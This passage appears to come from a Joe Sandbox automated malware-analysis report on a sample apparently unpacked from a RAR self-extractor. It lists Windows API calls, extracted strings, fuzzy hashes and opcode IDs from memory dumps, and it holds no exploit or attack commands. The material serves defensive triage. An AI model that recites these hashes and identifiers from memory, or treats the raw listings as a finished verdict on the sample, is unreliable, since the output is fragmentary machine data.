                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: 407f09584101771a1c7ffcd5bbcdb3846257fc3f153111c670ff0065badf355e
                                                                                    • Instruction ID: d7c51eeeb642bed1ef9f4956517817742778ed1efef11298508012367ec9bd30
                                                                                    • Opcode Fuzzy Hash: 407f09584101771a1c7ffcd5bbcdb3846257fc3f153111c670ff0065badf355e
                                                                                    • Instruction Fuzzy Hash: A5F0F435240701F7C65233286C0EA6B2A6E8FE2772F224124F728961E2EF6C8802456A
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0073DC47
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073DC61
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073DC72
                                                                                    • TranslateMessage.USER32(?), ref: 0073DC7C
                                                                                    • DispatchMessageW.USER32(?), ref: 0073DC86
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0073DC91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 2148572870-0
                                                                                    • Opcode ID: 3d209f8a6c146f4c67c123c56176547767cfe09d225941f7bcd23ef3b93de478
                                                                                    • Instruction ID: 4aa132ee055395c06dc9193d3062c73d24930ee522f6128d5df3a8b76f7b8c6d
                                                                                    • Opcode Fuzzy Hash: 3d209f8a6c146f4c67c123c56176547767cfe09d225941f7bcd23ef3b93de478
                                                                                    • Instruction Fuzzy Hash: 66F03C72A01219BBCB206BA5EC4CDDB7F6EEF42B91F108111B50AD2061D678CA46C7B4
                                                                                    APIs
                                                                                      • Part of subcall function 0073A699: GetDC.USER32(00000000), ref: 0073A69D
                                                                                      • Part of subcall function 0073A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0073A6A8
                                                                                      • Part of subcall function 0073A699: ReleaseDC.USER32(00000000,00000000), ref: 0073A6B3
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0073A83C
                                                                                      • Part of subcall function 0073AAC9: GetDC.USER32(00000000), ref: 0073AAD2
                                                                                      • Part of subcall function 0073AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                      • Part of subcall function 0073AAC9: ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                    • String ID: "s$($As
                                                                                    • API String ID: 1061551593-951805127
                                                                                    • Opcode ID: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                    • Instruction ID: 6c5758b691f93ab1e0cf860a829ac206e820a946957ead690f1bf30e0ad4c46a
                                                                                    • Opcode Fuzzy Hash: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                    • Instruction Fuzzy Hash: 60910271208744AFE711DF25C845A6BBBE9FFC8701F00891EF59AD3221DB74A945CB62
                                                                                    APIs
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 0072B92D: _wcsrchr.LIBVCRUNTIME ref: 0072B944
                                                                                    • _wcslen.LIBCMT ref: 0072C197
                                                                                    • _wcslen.LIBCMT ref: 0072C1DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                    • String ID: .exe$.rar$.sfx
                                                                                    • API String ID: 3513545583-31770016
                                                                                    • Opcode ID: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                    • Instruction ID: ca86f43ce5b4a889c75ace76f09141be1251c6c70133f6cbe4cafb05679f7eb6
                                                                                    • Opcode Fuzzy Hash: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                    • Instruction Fuzzy Hash: E4417962100375D6D733AF34A856A7E73A8EF61744F20050EF8C26B082EB6D5E91C391
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0072BB27
                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0072A275,?,?,00000800,?,0072A23A,?,0072755C), ref: 0072BBC5
                                                                                    • _wcslen.LIBCMT ref: 0072BC3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 3341907918-253988292
                                                                                    • Opcode ID: 5974f99e3f110f15bdc3c4f93cb61eaf977d7b7b38ed2e1eab592037b7a19911
                                                                                    • Instruction ID: e1fea8886560c4ce36eb51f0266c1ef0e7aff4dea10081cef7b476962c505a5f
                                                                                    • Opcode Fuzzy Hash: 5974f99e3f110f15bdc3c4f93cb61eaf977d7b7b38ed2e1eab592037b7a19911
                                                                                    • Instruction Fuzzy Hash: D641B671400225E6DF21AF20EC06EEE7769AF45391F148466F855A3151EBBCEED0CBB0
                                                                                    APIs
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0073CD84
                                                                                      • Part of subcall function 0073AF98: _wcschr.LIBVCRUNTIME ref: 0073B033
                                                                                      • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$CompareString
                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                    • API String ID: 69343711-3358265660
                                                                                    • Opcode ID: 0acbaa8895bf37ac5ff6e78dc1573175280d3eb2694427768e23473c0ddea1a3
                                                                                    • Instruction ID: b3a9d61500b7ad15aa3d8ca3d849bf673da24b525ab13bcbffd99b889f2f33c8
                                                                                    • Opcode Fuzzy Hash: 0acbaa8895bf37ac5ff6e78dc1573175280d3eb2694427768e23473c0ddea1a3
                                                                                    • Instruction Fuzzy Hash: F2316772940219AAEF26DB50DC45EEE73BCEB14350F408166F905E7181EBB89E848FA1
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0073AAD2
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID: -s$7s
                                                                                    • API String ID: 1429681911-2962036938
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0072B9B8
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072B9D6
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0072B9E6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                    • String ID: %c:\
                                                                                    • API String ID: 525462905-3142399695
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073B2BE
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0073B2D6
                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0073B304
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: GETPASSWORD1$xzw
                                                                                    • API String ID: 445417207-3717932900
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 0073B6ED
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0073B712
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073B744
                                                                                    • DeleteObject.GDI32(00000000), ref: 0073B767
                                                                                      • Part of subcall function 0073A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0073B73D,00000066), ref: 0073A6D5
                                                                                      • Part of subcall function 0073A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A6EC
                                                                                      • Part of subcall function 0073A6C2: LoadResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A703
                                                                                      • Part of subcall function 0073A6C2: LockResource.KERNEL32(00000000,?,?,?,0073B73D,00000066), ref: 0073A712
                                                                                      • Part of subcall function 0073A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0073B73D,00000066), ref: 0073A72D
                                                                                      • Part of subcall function 0073A6C2: GlobalLock.KERNEL32(00000000), ref: 0073A73E
                                                                                      • Part of subcall function 0073A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0073A762
                                                                                      • Part of subcall function 0073A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0073A7A7
                                                                                      • Part of subcall function 0073A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0073A7C6
                                                                                      • Part of subcall function 0073A6C2: GlobalFree.KERNEL32(00000000), ref: 0073A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                    • String ID: ]
                                                                                    • API String ID: 1797374341-3352871620
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073D64B
                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0073D661
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0073D675
                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0073D684
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00747E24,00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002), ref: 00747E93
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00747EA6
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00747E24,00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002), ref: 00747EC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    APIs
                                                                                      • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                      • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0072F2E4
                                                                                    • GetProcAddress.KERNEL32(007681C8,CryptUnprotectMemory), ref: 0072F2F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                    • API String ID: 2141747552-1753850145
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2252061734-0
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0074BF39
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074BF5C
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074BF82
                                                                                    • _free.LIBCMT ref: 0074BF95
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074BFA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,007491AD,0074B188,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074986E
                                                                                    • _free.LIBCMT ref: 007498A3
                                                                                    • _free.LIBCMT ref: 007498CA
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498D7
                                                                                    • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498E0
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free
                                                                                    • String ID:
                                                                                    • API String ID: 3170660625-0
                                                                                    APIs
                                                                                      • Part of subcall function 007311CF: ResetEvent.KERNEL32(?), ref: 007311E1
                                                                                      • Part of subcall function 007311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007311F5
                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00730F21
                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00730F3B
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00730F54
                                                                                    • CloseHandle.KERNEL32(?), ref: 00730F60
                                                                                    • CloseHandle.KERNEL32(?), ref: 00730F6C
                                                                                      • Part of subcall function 00730FE4: WaitForSingleObject.KERNEL32(?,000000FF,00731206,?), ref: 00730FEA
                                                                                      • Part of subcall function 00730FE4: GetLastError.KERNEL32(?), ref: 00730FF6
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1868215902-0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0074C817
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074C829
                                                                                    • _free.LIBCMT ref: 0074C83B
                                                                                    • _free.LIBCMT ref: 0074C84D
                                                                                    • _free.LIBCMT ref: 0074C85F
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00731FE5
                                                                                    • _wcslen.LIBCMT ref: 00731FF6
                                                                                    • _wcslen.LIBCMT ref: 00732006
                                                                                    • _wcslen.LIBCMT ref: 00732014
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0072B371,?,?,00000000,?,?,?), ref: 0073202F
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CompareString
                                                                                    • String ID:
                                                                                    • API String ID: 3397213944-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _swprintf
                                                                                    • String ID: %ls$%s: %s
                                                                                    • API String ID: 589789837-2259941744
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe,00000104), ref: 00747FAE
                                                                                    • _free.LIBCMT ref: 00748079
                                                                                    • _free.LIBCMT ref: 00748083
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                    • API String ID: 2506810119-2165197133
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007431FB
                                                                                    • _abort.LIBCMT ref: 00743306
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: EncodePointer_abort
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 948111806-2084237596
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00727406
                                                                                      • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007274CD
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 3813983858-639343689
                                                                                    • Opcode ID: 2067af4bfbb66f25185468535252ef981bcef817f3853e07d2aeec5105b49eef
                                                                                    • Instruction ID: 14ab132e8c6ac01f8555d702fc899a67e4af369f71233ca539a607b76a1021e1
                                                                                    • Opcode Fuzzy Hash: 2067af4bfbb66f25185468535252ef981bcef817f3853e07d2aeec5105b49eef
                                                                                    • Instruction Fuzzy Hash: 3931C7B1E04268EADF15EBA4ED49FEEBBB9EF09300F048055F805A7192D77C8A44C760
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0073AD98
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0073ADAD
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0073ADC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmp
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmp
